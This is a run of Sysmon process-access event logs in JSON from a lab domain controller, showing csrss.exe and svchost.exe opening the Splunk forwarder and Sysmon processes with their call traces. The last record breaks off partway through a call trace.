{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5906,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03AB-5F25-0000-0010BBF80A00}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03AB-5F25-0000-0010BBF80A00}","TargetProcessId":"5076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5907,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5908,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5909,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5910,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5911,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5912,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5913,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5914,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 